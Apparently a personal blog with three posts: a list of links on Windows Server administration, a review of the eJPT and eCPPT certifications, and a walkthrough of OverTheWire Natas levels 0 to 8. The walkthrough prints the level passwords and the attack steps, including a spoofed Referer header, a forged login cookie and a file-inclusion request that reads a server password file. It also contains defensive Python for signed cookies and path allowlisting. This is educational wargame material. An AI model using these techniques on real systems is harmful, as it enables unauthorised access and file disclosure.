Tuesday 10 October 2017

Microsoft Infrastructure Fundamentals

Some references I gathered over time on Microsoft Windows Administration.

Happy reading,
Yuriy

Server Limits Specifications:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx#physical_memory_limits_windows_server_2012

Logical CPU Limits:
https://blogs.technet.microsoft.com/matthts/2012/10/13/windows-server-sockets-logical-processors-symmetric-multi-threading/

Windows Server Comparison:
https://www.thomas-krenn.com/en/wiki/Windows_Server_2012_Editions_comparison


Articles:
Default gateways
https://technet.microsoft.com/en-us/library/cc779696(v=ws.10).aspx

DNSSEC:
https://technet.microsoft.com/en-us/library/jj200221.aspx

DNS Records:
https://technet.microsoft.com/en-us/library/cc958958.aspx

Domains:
https://technet.microsoft.com/en-us/library/cc780856(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/bb629410.aspx
https://technet.microsoft.com/en-us/library/dd197461
https://technet.microsoft.com/en-us/library/cc780661
https://technet.microsoft.com/en-us/library/cc730756
https://technet.microsoft.com/en-us/library/cc754345.aspx
https://technet.microsoft.com/en-us/library/cc725590.aspx
https://technet.microsoft.com/en-us/library/cc771255(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc755131.aspx
https://technet.microsoft.com/en-us/library/ee683907(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc753579.aspx

Zones:
https://technet.microsoft.com/en-us/library/cc771898.aspx
https://technet.microsoft.com/en-us/library/cc816885(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779197(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649181(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc775397(v=ws.10).aspx

Cache Locking:
https://technet.microsoft.com/en-us/library/ee649148(v=ws.10).aspx

IP Addresses:
https://technet.microsoft.com/en-us/library/cc958825.aspx
https://technet.microsoft.com/en-us/library/bb726995.aspx
https://technet.microsoft.com/en-us/library/cc958834.aspx
https://technet.microsoft.com/en-us/library/cc940018.aspx

DHCP:
https://technet.microsoft.com/en-us/library/cc738472(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc783103(WS.10).aspx
https://technet.microsoft.com/en-us/library/hh831825.aspx
https://technet.microsoft.com/en-us/library/cc958946.aspx
https://technet.microsoft.com/en-us/library/cc958935.aspx
http://www.tcpipguide.com/free/t_DHCPLeaseRenewalandRebindingProcesses-2.htm
http://www.thenetworkencyclopedia.com/entry/dynamic-host-configuration-protocol-dhcp/
https://technet.microsoft.com/en-us/library/cc779610(v=ws.10).aspx

What Are Domains and Forests?
https://technet.microsoft.com/en-us/library/cc759073(v=ws.10).aspx

Active Directory Administrative Center: Getting Started:
https://technet.microsoft.com/en-us/library/dd560651(v=ws.10).aspx

Understanding Sites, Subnets, and Site Links:
https://technet.microsoft.com/en-us/library/cc754697.aspx

Privileged Access Management for Active Directory Domain Services:
https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services

Install and Deploy Windows Server 2012 R2 and Windows Server 2012:
https://technet.microsoft.com/en-us/library/hh831620.aspx

Migrating Roles and Features in Windows Server:
https://technet.microsoft.com/en-us/windowsserver/jj554790.aspx

Linking GPOs to Active Directory Containers:
https://msdn.microsoft.com/en-us/library/aa374339(v=vs.85).aspx

Designing OU Structures that Work:
https://technet.microsoft.com/en-us/magazine/2008.05.oudesign.aspx

Active Directory Best Practice: OUs and Containers:
http://www.trivalentgroup.com/2015/11/active-directory-best-practice-ous-and-containers/

Active Directory Schema Tools and Settings
https://technet.microsoft.com/en-us/library/cc757747(v=ws.10).aspx

What Is the Global Catalog?
https://technet.microsoft.com/en-us/library/cc728188(v=ws.10).aspx

What Is the Active Directory Schema?
https://technet.microsoft.com/en-us/library/cc784826(v=ws.10).aspx

Resetting the Directory Services Restore Mode (DSRM) password:
https://technet.microsoft.com/en-us/library/cc754363(v=ws.11).aspx

Performing an Authoritative Restore:
https://technet.microsoft.com/en-us/library/cc940334.aspx

Performing a Nonauthoritative Restore of a Domain Controller
https://technet.microsoft.com/en-us/library/cc784922(v=ws.10).aspx

Understanding Trusts:
https://technet.microsoft.com/en-us/library/cc736874(v=ws.10).aspx

Ntdsutil
https://technet.microsoft.com/en-us/library/cc753343.aspx

Server Manager Technical Overview:
https://technet.microsoft.com/en-us/library/cc753319.aspx

Managing Windows Server 2012 and Windows Server 2012 R2 with Remote Server Administration Tools:
https://blogs.technet.microsoft.com/ausoemteam/2015/03/21/managing-windows-server-2012-and-windows-server-2012-r2-with-remote-server-administration-tools/

Recovering Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816751(v=ws.10).aspx

Requirements for Active Directory Recycle Bin:
https://technet.microsoft.com/en-us/library/dd379484(v=ws.10).aspx

Active Directory Recycle Bin Step-by-Step Guide:
https://technet.microsoft.com/en-us/library/dd392261(v=ws.10).aspx

Group types:
https://technet.microsoft.com/en-us/library/cc781446(v=ws.10).aspx

Default groups:
https://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx

Nesting groups:
https://technet.microsoft.com/en-us/library/cc776499(v=ws.10).aspx

Active Directory Security Groups:
https://technet.microsoft.com/en-us/library/dn579255(v=ws.11).aspx

Managing Computers:
https://technet.microsoft.com/en-us/library/cc771682.aspx

Detailed Concepts: Secure Channel Explained
http://social.technet.microsoft.com/wiki/contents/articles/24644.detailed-concepts-secure-channel-explained.aspx

Group Policy Overview
https://technet.microsoft.com/en-us/library/hh831791.aspx

Performance Team Blog:
https://blogs.technet.microsoft.com/askperf/

SMB:
https://blogs.technet.microsoft.com/josebda/2013/10/02/windows-server-2012-r2-which-version-of-the-smb-protocol-smb-1-0-smb-2-0-smb-2-1-smb-3-0-or-smb-3-02-are-you-using/

BitLocker:
https://technet.microsoft.com/en-us/library/cc766200%28v=ws.10%29.aspx
https://technet.microsoft.com/en-us/library/cc732774.aspx
https://technet.microsoft.com/en-us/library/jj679890.aspx

Storage Technologies:
https://technet.microsoft.com/en-us/library/dn610883.aspx
https://technet.microsoft.com/en-us/library/hh831739.aspx
https://blogs.technet.microsoft.com/josebda/2014/11/19/storage-spaces-survival-guide-links-to-presentations-articles-blogs-tools/
https://technet.microsoft.com/windows-server-docs/storage/storage-spaces/storage-spaces-direct-windows-server-2016
https://blogs.technet.microsoft.com/askpfeplat/2012/10/10/windows-server-2012-storage-spaces-is-it-for-you-could-be/
https://technet.microsoft.com/windows-server-docs/storage/software-defined-storage/storage-quality-of-service
https://technet.microsoft.com/en-us/library/hh831602.aspx


Hands on:

Deduplication:
https://blogs.technet.microsoft.com/canitpro/2013/04/29/step-by-step-enabling-data-deduplication-on-windows-server-2012-volumes/

iSCSI:
https://blogs.technet.microsoft.com/filecab/2012/05/21/introduction-of-iscsi-target-in-windows-server-2012/

BitLocker:
http://accc.uic.edu/answer/how-do-i-configure-active-directory-store-bitlocker-recovery-information

DHCP:
https://technet.microsoft.com/en-us/library/cc732075.aspx
https://technet.microsoft.com/en-us/library/cc757682(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc779507(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/dn425039.aspx
https://technet.microsoft.com/en-us/library/cc786474(v=ws.10).aspx
https://blogs.technet.microsoft.com/teamdhcp/2009/01/22/how-to-configure-split-scope-using-wizard/
https://blogs.technet.microsoft.com/teamdhcp/2012/09/03/dhcp-failover-hot-standby-mode/
http://www.serverlab.ca/tutorials/windows/network-services-windows/step-step-creating-windows-server-dhcp-scope/
https://technet.microsoft.com/en-us/library/dd759168(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

DNS:
https://technet.microsoft.com/en-us/library/cc754941
https://blogs.technet.microsoft.com/networking/2008/03/19/dont-be-afraid-of-dns-scavenging-just-be-patient/
https://technet.microsoft.com/en-us/library/ff807360(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/cc816657(v=ws.10).aspx
https://technet.microsoft.com/en-us/library/ee649174(v=ws.10).aspx

Storage Spaces: How to configure Storage Tiers with Windows Server 2012 R2:
https://blogs.technet.microsoft.com/askpfeplat/2013/10/20/storage-spaces-how-to-configure-storage-tiers-with-windows-server-2012-r2/

Installing and Configuring MPIO:
https://technet.microsoft.com/en-us/library/ee619752(v=ws.10).aspx

Installing and Configuring Microsoft iSCSI Initiator:
https://technet.microsoft.com/en-us/library/ee338480(v=ws.10).aspx

Switch between Full and Server Core in Windows Server 2012 using PowerShell 3.0:
https://blogs.technet.microsoft.com/puneetvig/2012/10/15/switch-between-full-and-server-core-in-windows-server-2012-using-powershell-3-0/

How to change default OU for computers in AD:
https://blogs.technet.microsoft.com/canitpro/

Install a New Windows Server 2012 Active Directory Child or Tree Domain (Level 200):
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/deploy/install-a-new-windows-server-2012-active-directory-child-or-tree-domain--level-200-

http://pc-addicts.com/server-2012-change-default-ou/

Step-by-Step: Enabling and Using Fine-Grained Password Policies in AD
https://blogs.technet.microsoft.com/canitpro/2013/05/29/step-by-step-enabling-and-using-fine-grained-password-policies-in-ad/

How To Enable the Active Directory Recycle Bin:
https://redmondmag.com/articles/2015/11/11/enable-the-active-directory-recycle-bin.aspx

Step-By-Step: Setting Up Active Directory Sites, Subnets & Site-Links
https://blogs.technet.microsoft.com/canitpro/2015/03/03/step-by-step-setting-up-active-directory-sites-subnets-site-links/

Getting Started with Nano Server:
https://technet.microsoft.com/windows-server-docs/compute/nano-server/getting-started-with-nano-server

Get started with Setup and Boot Event Collection
https://technet.microsoft.com/windows-server-docs/compute/get-started-with-setup-and-boot-event-collection

Evaluation:
https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012?wt.mc_id=DXLEX_EDX_INF500x

ADSI Edit (adsiedit.msc)
https://technet.microsoft.com/en-us/library/cc773354(v=ws.10).aspx

Remote Server Administration Tools for Windows 10

How to Install Service Manager on a Single Computer
https://technet.microsoft.com/en-us/library/hh519747(v=sc.12).aspx

Promoting DC:
https://www.interworks.com/blog/ijahanshahi/2014/01/06/promoting-windows-2012r2-server-domain-controller

Configure Remote Desktop Access on Windows 7 Systems:
https://technet.microsoft.com/en-us/magazine/ff404238.aspx

Special Identities
https://technet.microsoft.com/en-us/library/dn617202.aspx

PS AD DS:
https://technet.microsoft.com/en-us/library/hh852274(v=wps.630).aspx

Use the Wbadmin Backup Command Line Utility in Windows Server 2008:
https://technet.microsoft.com/en-us/magazine/dd767786.aspx

Backing Up Active Directory Domain Services:
https://technet.microsoft.com/en-us/library/cc816584(v=ws.10).aspx

Offline Domain Join (Djoin.exe) Step-by-Step Guide
https://technet.microsoft.com/en-us/library/offline-domain-join-djoin-step-by-step(v=ws.10).aspx

Delegate Permissions for Group Policy
https://technet.microsoft.com/en-us/library/dn789195.aspx

Create a new organizational unit
https://technet.microsoft.com/en-us/library/cc785077(v=ws.10).aspx

Creating the Security Group
https://technet.microsoft.com/en-us/library/cc732782(v=ws.10).aspx

Creating Roaming Profiles:
http://www.grouppolicy.biz/2010/08/best-practice-roaming-profiles-and-folder-redirection-a-k-a-user-virtualization/

PowerShell stuff:
https://technet.microsoft.com/en-us/library/ee617253.aspx
https://technet.microsoft.com/en-us/library/ee617258.aspx
https://technet.microsoft.com/en-us/library/ee617210.aspx
https://technet.microsoft.com/en-us/library/ee617245.aspx
https://technet.microsoft.com/en-us/library/jj574143.aspx
https://technet.microsoft.com/en-us/library/jj612821(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh826098(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj612803%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh826099%28v=wps.630%29.aspx
https://technet.microsoft.com/en-us/library/hh848689(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh848686(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/hh831434.aspx
https://technet.microsoft.com/en-us/library/hh848450.aspx
https://technet.microsoft.com/en-us/library/hh831700.aspx
https://technet.microsoft.com/windows-server-docs/networking/dns/what-s-new-in-dns-server
https://technet.microsoft.com/en-us/library/jj590751(v=wps.630).aspx
https://technet.microsoft.com/en-us/library/jj590743(v=wps.630).aspx

Thursday 3 August 2017

Review eLearnSecurity eJPT, eCPPT

I currently hold the following penetration testing certifications from eLearnSecurity, having passed both exams:
  • eJPT
  • eCPPT

I would like to share my experience here.

About the labs: they are quite different in approach from other certifications, as the orientation is towards skills rather than CTF-style targets. Personally I found this the better choice, since you learn a lot in a very short time (if you are dedicated). Having no free time, my only option was to study early in the morning, from 6 am to 8 am. After obtaining the eJPT I was able to pass the eCPPT as well within a month.

Most important takeaways during the learning process:
- Do all the labs.
- Try to automate tasks and repeat the labs with the automated tools you have created.
- Know the flaws of your tools.
- Document everything and be organized.
- Read.
- Advance.

Labs

During the labs I found that some of the tools I use have changed over time, Metasploit specifically. There are lots of online resources on Metasploit so this is not a big issue, but it will waste your time if you have not done your research. For example, I was really surprised that some Windows post-exploitation tools are no longer supported. So do your research in advance. Also try to understand how a task can be done manually: for instance, if tool X does not work, as a workaround I can export registry key Y, decrypt password Z, etc.

"This lab does not work as expected" - find out why. This can happen, and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment locally and understand how the attack works: recreating the situation helps a lot in understanding the circumstances you are dealing with, and in most cases it is just a setting you have overlooked.

Knowledge domains

In a nutshell, eJPT gives you the ground knowledge, while eCPPT is a deep dive into the penetration testing world in which you also get to practice exploit development, which is itself a huge knowledge domain. Pivoting is another technique you have to master: it is widely used and will be of great advantage to you, as you have to know how to "move" between networks. All topics are widely covered both theoretically and practically; my advice would be to take the practical part more seriously.

As they state: 

eJPT:
  • Good knowledge of TCP/IP
  • Good knowledge of IP routing
  • Good knowledge of LAN protocols and devices
  • Good knowledge of HTTP and web technologies
  • Essential penetration testing processes and methodologies
  • Basic Vulnerability Assessment of Networks
  • Basic Vulnerability Assessment of Web Applications
  • Exploitation with Metasploit
  • Simple Web application Manual exploitation
  • Basic Information Gathering and Reconnaissance
  • Simple Scanning and Profiling the target

eCPPT:
  • Penetration testing processes and methodologies
  • Vulnerability Assessment of Networks
  • Vulnerability Assessment of Web Applications
  • Advanced Exploitation with Metasploit
  • Performing Attacks in Pivoting
  • Web application Manual exploitation
  • Information Gathering and Reconnaissance
  • Scanning and Profiling the target
  • Privilege escalation and Persistence
  • Exploit Development
  • Advanced Reporting skills and Remediation



Exams

Surprisingly fun; I have not had that much fun in years. If you have done the labs you cannot go wrong. If you have issues during the exam lab you can reset it, but remember that you will then have to re-exploit all of your targets, so automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT, as far as I remember, you get 3 days; in my opinion 24 hours is more than enough for this level. The eCPPT exam was really interesting; I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you get to test the skills you have learned, so again, do the labs properly.

About the penetration testing report for eCPPT: the report is the most interesting part. You will have to organize all of your information and prepare a detailed analysis; it is best to write it manually if you want to have a good report and pass the exam.

Tools

You are not limited in any way.

References:



Thursday 19 January 2017

Natas Level 0 to 10

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L0

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>

L1
Chrome -> Ctrl+U
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>

L2
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

http://natas.labs.overthewire.org/js/wechall-data.js
var wechalldata = {
    "natas0": 1,
    "natas1": 2,
    "natas2": 3,
    "natas3": 4,
    "natas4": 5,
    "natas5": 6,
    "natas6": 7,
    "natas7": 8,
    "natas8": 15,
    "natas9": 14,
    "natas10": 13,
    "natas11": 12,
    "natas12": 11,
    "natas13": 10,
    "natas14": 9,
    "natas15": 16,
    "natas16": 17,
    "natas17": 18,
    "natas18": 137,
    "natas19": 138,
    "natas20": 139,
    "natas21": 140,
    "natas22": 141,
    "natas23": 142,
    "natas24": 213,
    "natas25": 214,
    "natas26": 215,
    "natas27": 216
}

http://natas2.natas.labs.overthewire.org/files/
[IMG] pixel.png 2016-06-25 11:58 303
[TXT] users.txt 2016-06-25 12:42 145

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH


L3:
robots.txt:
User-agent: *
Disallow: /s3cr3t/

http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

L4:
Burp -> Proxy -> Intercept On -> Add -> Referer natas5.natas.labs.overthewire.org

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

L5:
GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: bg,en-US;q=0.8,en;q=0.6
Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
DNT: 1
Connection: close

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>
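The natas5 server trusts the client-supplied `loggedin=1` cookie verbatim, so the authorization decision lives entirely in the browser. As an added example that is not part of the Natas walkthrough, the Python below contrasts that plain flag with an HMAC-signed, expiring cookie a server can actually verify; the key, cookie format and usernames are constructed for the illustration.

```python
import hashlib
import hmac
import time

# Constructed server-side key for this illustration; a real deployment keeps
# it outside the webroot and rotates it. The client never sees it.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def _parse_cookie_header(cookie_header):
    """Split 'a=1; b=2' into a dict, keeping '=' inside values intact."""
    pairs = (part.strip().split("=", 1) for part in cookie_header.split(";") if "=" in part)
    return dict(pairs)


def plain_is_logged_in(cookie_header):
    """The natas5 pattern: whoever sets loggedin=1 is 'logged in'."""
    return _parse_cookie_header(cookie_header).get("loggedin") == "1"


def _sign(payload):
    # Keyed MAC over the payload; without SERVER_KEY a client cannot forge it.
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_session_cookie(username, ttl_seconds, now=None):
    """Issue loggedin=<user>|<expiry>|<hmac>. The tag binds user and expiry."""
    now = int(time.time()) if now is None else now
    payload = f"{username}|{now + ttl_seconds}"
    return f"loggedin={payload}|{_sign(payload)}"


def signed_is_logged_in(cookie_header, now=None):
    """Return the username if the cookie is authentic and unexpired, else None."""
    now = int(time.time()) if now is None else now
    value = _parse_cookie_header(cookie_header).get("loggedin", "")
    try:
        # rsplit from the right so a '|' inside the username cannot shift fields
        username, expiry_str, tag = value.rsplit("|", 2)
        expiry = int(expiry_str)
    except ValueError:
        return None  # malformed, including the bare 'loggedin=1' of natas5
    # constant-time compare so the tag cannot be guessed byte by byte
    if not hmac.compare_digest(tag, _sign(f"{username}|{expiry}")):
        return None
    if now >= expiry:
        return None
    return username


if __name__ == "__main__":
    # A client can flip the plain flag; it cannot mint a valid signed cookie.
    print(plain_is_logged_in("__cfduid=abc; loggedin=1"))          # True
    cookie = issue_session_cookie("natas5", ttl_seconds=600, now=1000)
    print(signed_is_logged_in(cookie, now=1500))                     # natas5
    print(signed_is_logged_in(cookie.replace("natas5|", "admin|"), now=1500))  # None
    print(signed_is_logged_in("loggedin=1", now=1500))               # None
```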

L6:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

L7:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>
</html>

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
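The natas7 `page=` parameter is handed straight to the include, so any file readable by the web server can be pulled in. As an added example that is not part of the walkthrough, the Python below models the two fixes a defender would apply (a strict allowlist, and path confinement as a fallback) and a small log check that flags requests like the one above. The pages directory, page names and log lines are constructed for the illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlparse

# Constructed layout (hypothetical paths): only Home and About exist, mirroring
# the two links on the natas7 index. posixpath is used because the target is
# a Linux web server, regardless of where this script runs.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}


class PageNotAllowed(ValueError):
    """Raised when a page parameter must not reach include()."""


def resolve_page_allowlist(page_param):
    """Preferred fix: the parameter is a dictionary key, never a path fragment."""
    if page_param not in ALLOWED_PAGES:
        raise PageNotAllowed(page_param)
    return posixpath.join(PAGES_DIR, ALLOWED_PAGES[page_param])


def resolve_page_confined(page_param):
    """Fallback fix for apps with many pages: build the path, normalise it, then
    refuse anything that escaped PAGES_DIR. Normalisation must happen before the
    check so '../' sequences and absolute paths are both caught."""
    if not page_param or "\x00" in page_param:
        raise PageNotAllowed(page_param)
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page_param + ".php"))
    # join() discards PAGES_DIR when page_param is absolute, so commonpath fails
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        raise PageNotAllowed(page_param)
    return candidate


# Constructed access-log lines in Apache combined format; the second one is the
# request shown in the walkthrough above.
LOG_SAMPLE = [
    '10.0.0.5 - - [19/Jan/2017:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Jan/2017:10:00:07 +0000] "GET /index.php?page=/etc/natas_webpass/natas8 HTTP/1.1" 200 33',
    '10.0.0.9 - - [19/Jan/2017:10:01:13 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1800',
    '10.0.0.9 - - [19/Jan/2017:10:01:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 480',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_includes(log_lines):
    """Return (page value, reason) for every request whose page parameter is not
    an allowlisted page. Absolute paths and traversal get a specific label."""
    hits = []
    for line in log_lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlparse(match.group(1)).query)
        for value in query.get("page", []):
            if value in ALLOWED_PAGES:
                continue
            if value.startswith("/"):
                reason = "absolute path"
            elif ".." in value:
                reason = "traversal"
            else:
                reason = "unknown page"
            hits.append((value, reason))
    return hits


if __name__ == "__main__":
    print(resolve_page_allowlist("home"))
    for bad in ("/etc/natas_webpass/natas8", "../../../etc/passwd"):
        try:
            resolve_page_confined(bad)
        except PageNotAllowed as exc:
            print("rejected:", exc)
    print(suspicious_includes(LOG_SAMPLE))
```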

                    L8:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas8</h1>
                    <div id="content">

                    <?

                    $encodedSecret = "3d3d516343746d4d6d6c315669563362";

                    function encodeSecret($secret) {
                        return bin2hex(strrev(base64_encode($secret)));
                    }

                    if(array_key_exists("submit", $_POST)) {
                        if(encodeSecret($_POST['secret']) == $encodedSecret) {
                        print "Access granted. The password for natas9 is <censored>";
                        } else {
                        print "Wrong secret";
                        }
                    }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

                     oubWYf2kBq

                     Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
